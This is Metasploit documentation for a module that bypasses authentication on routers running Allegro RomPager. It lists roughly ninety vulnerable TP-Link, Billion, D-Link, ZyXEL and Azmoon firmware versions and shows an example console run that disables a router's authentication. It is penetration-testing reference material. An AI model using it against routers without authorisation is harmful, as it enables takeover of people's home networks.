documentation/modules/auxiliary/admin/http/allegro_rompager_auth_bypass.md
## Vulnerable devices
The following devices and firmware versions are known to be vulnerable:
* Azmoon AZ-D140W - 2.11.89.0(RE2.C29)3.11.11.52_PMOFF.1
* Billion BiPAC 5102S - Av2.7.0.23 (UE0.B1C)
* Billion BiPAC 5102S - Bv2.7.0.23 (UE0.B1C)
* Billion BiPAC 5200 - 2.11.84.0(UE2.C2)3.11.11.6
* Billion BiPAC 5200 - 2_11_62_2_ UE0.C2D_3_10_16_0
* Billion BiPAC 5200A - 2_10_5 _0(RE0.C2)3_6_0_0
* Billion BiPAC 5200A - 2_11_38_0 (RE0.C29)3_10_5_0
* Billion BiPAC 5200GR4 - 2.11.91.0(RE2.C29)3.11.11.52
* Billion BiPAC 5200SRD - 2.10.5.0 (UE0.C2C) 3.6.0.0
* Billion BiPAC 5200SRD - 2.12.17.0_UE2.C3_3.12.17.0
* Billion BiPAC 5200SRD - 2_11_62_2(UE0.C3D)3_11_11_22
* D-Link DSL-2520U - Z1 1.08 DSL-2520U_RT63261_Middle_East_ADSL
* D-Link DSL-2600U - Z1_DSL-2600U
* D-Link DSL-2600U - Z2_V1.08_ras
* TP-Link TD-8616 - V2_080513
* TP-Link TD-8816 - V4_100528_Russia
* TP-Link TD-8816 - V4_100524
* TP-Link TD-8816 - V5_100528_Russia
* TP-Link TD-8816 - V5_100524
* TP-Link TD-8816 - V5_100903
* TP-Link TD-8816 - V6_100907
* TP-Link TD-8816 - V7_111103
* TP-Link TD-8816 - V7_130204
* TP-Link TD-8817 - V5_100524
* TP-Link TD-8817 - V5_100702_TR
* TP-Link TD-8817 - V5_100903
* TP-Link TD-8817 - V6_100907
* TP-Link TD-8817 - V6_101221
* TP-Link TD-8817 - V7_110826
* TP-Link TD-8817 - V7_130217
* TP-Link TD-8817 - V7_120509
* TP-Link TD-8817 - V8_140311
* TP-Link TD-8820 - V3_091223
* TP-Link TD-8840T - V1_080520
* TP-Link TD-8840T - V2_100525
* TP-Link TD-8840T - V2_100702_TR
* TP-Link TD-8840T - V2_090609
* TP-Link TD-8840T - V3_101208
* TP-Link TD-8840T - V3_110221
* TP-Link TD-8840T - V3_120531
* TP-Link TD-W8101G - V1_090107
* TP-Link TD-W8101G - V1_090107
* TP-Link TD-W8101G - V2_100819
* TP-Link TD-W8101G - V2_101015_TR
* TP-Link TD-W8101G - V2_101101
* TP-Link TD-W8101G - V3_110119
* TP-Link TD-W8101G - V3_120213
* TP-Link TD-W8101G - V3_120604
* TP-Link TD-W8151N - V3_120530
* TP-Link TD-W8901G - V1_080522
* TP-Link TD-W8901G - V1,2_080522
* TP-Link TD-W8901G - V2_090113_Turkish
* TP-Link TD-W8901G - V3_140512
* TP-Link TD-W8901G - V3_100603
* TP-Link TD-W8901G - V3_100702_TR
* TP-Link TD-W8901G - V3_100901
* TP-Link TD-W8901G - V6_110119
* TP-Link TD-W8901G - V6_110915
* TP-Link TD-W8901G - V6_120418
* TP-Link TD-W8901G - V6_120213
* TP-Link TD-W8901GB - V3_100727
* TP-Link TD-W8901GB - V3_100820
* TP-Link TD-W8901N - V1_111211
* TP-Link TD-W8951ND - V1_101124,100723,100728
* TP-Link TD-W8951ND - V1_110907
* TP-Link TD-W8951ND - V1_111125
* TP-Link TD-W8951ND - V3.0_110729_FI
* TP-Link TD-W8951ND - V3_110721
* TP-Link TD-W8951ND - V3_20110729_FI
* TP-Link TD-W8951ND - V4_120511
* TP-Link TD-W8951ND - V4_120607
* TP-Link TD-W8951ND - V4_120912_FL
* TP-Link TD-W8961NB - V1_110107
* TP-Link TD-W8961NB - V1_110519
* TP-Link TD-W8961NB - V2_120319
* TP-Link TD-W8961NB - V2_120823
* TP-Link TD-W8961ND - V1_100722,101122
* TP-Link TD-W8961ND - V1_101022_TR
* TP-Link TD-W8961ND - V1_111125
* TP-Link TD-W8961ND - V2_120427
* TP-Link TD-W8961ND - V2_120710_UK
* TP-Link TD-W8961ND - V2_120723_FI
* TP-Link TD-W8961ND - V3_120524,120808
* TP-Link TD-W8961ND - V3_120830
* ZyXEL P-660R-T3 - 3.40(BOQ.0)C0
* ZyXEL P-660RU-T3 - 3.40(BJR.0)C0
## Module usage
This is an example run against TP-Link TD-8817 router:
```
msf > use auxiliary/admin/http/allegro_rompager_auth_bypass
msf auxiliary(allegro_rompager_auth_bypass) > show options
Module options (auxiliary/admin/http/allegro_rompager_auth_bypass):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.1.1 yes The target address
RPORT 80 yes The target port
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes URI to test
VHOST no HTTP server virtual host
msf auxiliary(allegro_rompager_auth_bypass) > set rhost 192.168.1.1
rhost => 192.168.1.1
msf auxiliary(allegro_rompager_auth_bypass) > run
[+] Detected device:TP-Link TD-8817
[-] Bad response
[-] Bad response
[+] Good response, please check host, authentication should be disabled
[*] Auxiliary module execution completed
```